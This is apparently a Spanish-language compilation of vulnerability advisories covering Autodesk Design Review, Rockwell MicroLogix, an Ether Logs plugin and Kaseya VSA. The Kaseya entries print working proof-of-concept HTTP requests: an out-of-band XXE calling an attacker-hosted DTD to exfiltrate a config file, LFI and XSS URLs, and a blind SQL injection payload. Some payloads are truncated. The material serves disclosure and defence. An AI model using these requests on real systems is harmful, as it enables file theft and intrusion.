Vulnerabilidades

Un archivo PNG, PDF o DWF malintencionado en Autodesk Design Review 2018, 2017, 2013, 2012, 2011 puede ser utilizado para intentar liberar un objeto que ya ha sido liberado mientras los analiza. Esta vulnerabilidad puede ser explotada por actores maliciosos remotos para ejecutar código arbitrario

Un archivo PCX, PICT, RCL, TIF, BMP, PSD o TIFF malicioso puede utilizarse para escribir más allá del búfer asignado mientras se analizan archivos PCX, PDF, PICT, RCL, BMP, PSD o TIFF. Esta vulnerabilidad puede ser explotada para ejecutar código arbitrario

Una vulnerabilidad de confusión de tipo en Autodesk Design Review 2018, 2017, 2013, 2012, 2011 puede ocurrir al procesar un archivo PDF maliciosamente diseñado. Un actor malicioso puede aprovechar esto para ejecutar código arbitrario

Rockwell Automation MicroLogix 1100, todas las versiones, permite a un atacante remoto no autenticado enviar comandos especialmente diseñados para causar un fallo en el PLC cuando el controlador es colocado en modo RUN, lo que resulta en una condición de denegación de servicio. Si es explotado con éxito, esta vulnerabilidad causará al controlador cometer un fallo cada vez que es colocado en modo RUN

Un archivo TIFF, TIF, PICT, TGA o DWF malintencionado en Autodesk Design Review 2018, 2017, 2013, 2012, 2011 puede ser forzado a leer más allá de los límites asignados al analizar los archivos TIFF, PICT, TGA o DWF. Esta vulnerabilidad en conjunto con otras vulnerabilidades podría llevar a la ejecución de código en el contexto del proceso actual

Una vulnerabilidad Double Free permite a los atacantes remotos ejecutar código arbitrario en archivos PDF dentro de las instalaciones afectadas de Autodesk Design Review 2018, 2017, 2013, 2012, 2011. Se requiere la interacción del usuario para explotar esta vulnerabilidad, ya que el objetivo debe visitar una página maliciosa o abrir un archivo malicioso

Podría producirse un desbordamiento del búfer basado en la pila mientras se analizan archivos PICT, PCX, RCL o TIFF en Autodesk Design Review 2018, 2017, 2013, 2012, 2011. Esta vulnerabilidad puede ser explotada para ejecutar código arbitrario.

Ether Logs es un paquete que permite comprobar los registros en la sección de utilidades de Craft 3. En versiones anteriores a 3.0.4 se ha encontrado una vulnerabilidad que permitía a usuarios administradores autenticados acceder a cualquier archivo del servidor. La vulnerabilidad ha sido corregida en versión 3.0.4. Como solución alternativa, se puede desactivar el plugin si fuentes no confiables presentan acceso de administrador

La API /vsaWS/KaseyaWS.asmx puede utilizarse para enviar XML al sistema. Cuando este XML es procesado (externo) las entidades son procesadas y obtenidas de forma insegura por el sistema y devueltas al atacante. Descripción detallada Dada la siguiente petición: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob. dtd"><data>&send;</data> ``` Y el siguiente archivo XML alojado en http://192.168.1.170/oob.dtd: ``` "> %eval; %error; ``` El servidor obtendrá este archivo XML y lo procesará, leerá el archivo c:\kaseya\kserver\kserver.ini y devolverá el contenido en la respuesta del servidor como se indica a continuación. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerEl servidor no pudo procesar la solicitud. ---Hay un error en el documento XML (24, -1000): Identificador de fragmento '######################################################################## # Este es el archivo de configuración para el KServer. # Colóquelo en el mismo directorio que el ejecutable del KServer # Una línea en blanco o una nueva cabecera de sección válida [] termina cada sección. # Las líneas de comentario comienzan con ; o # ######################################################################## ``` Problemas de seguridad descubiertos --- * La API resuelve de forma insegura entidades XML externas * La API tiene una respuesta de error demasiado verbosa Impacto --- Usando esta vulnerabilidad un atacante puede leer cualquier archivo en el servidor que el proceso del servidor web pueda leer. Además, puede ser utilizado para realizar solicitudes HTTP(s) en la red local y así utilizar el sistema Kaseya para pivotar en la red local

XSS reflexivo autenticado en HelpDeskTab/rcResults.asp El parámetro result de /HelpDeskTab/rcResults.asp se devuelve de forma insegura en la página web solicitada y puede utilizarse para realizar un ataque de Cross Site Scripting Ejemplo de solicitud: `https://x.x.x.x/HelpDeskTab/rcResults. asp?result=` Lo mismo ocurre con el parámetro FileName de /done.asp Petición de ejemplo: `https://x.x.x.x/done.asp?FileName=";

Inclusión de archivos locales semiautenticados El contenido de archivos arbitrarios puede ser devuelto por el servidor web Ejemplo de solicitud: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` Se requiere un SessionId válido pero puede ser fácilmente obtenido a través de CVE-2021-30118

La llamada a la API /InstallTab/exportFldr.asp es vulnerable a una inyección SQL ciega semiautenticada basada en booleanos en el parámetro fldrId. Descripción detallada --- Dada la siguiente petición: ``` GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Donde el valor de la cookie sessionId se ha obtenido mediante CVE-2021-30116. El resultado debería ser un fallo. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 Whoops. ----SNIP---- ``` Sin embargo, cuando fldrId está configurado como '(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))' la petición está permitida. Solicitud: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29END%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Respuesta: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 Carpeta de exportación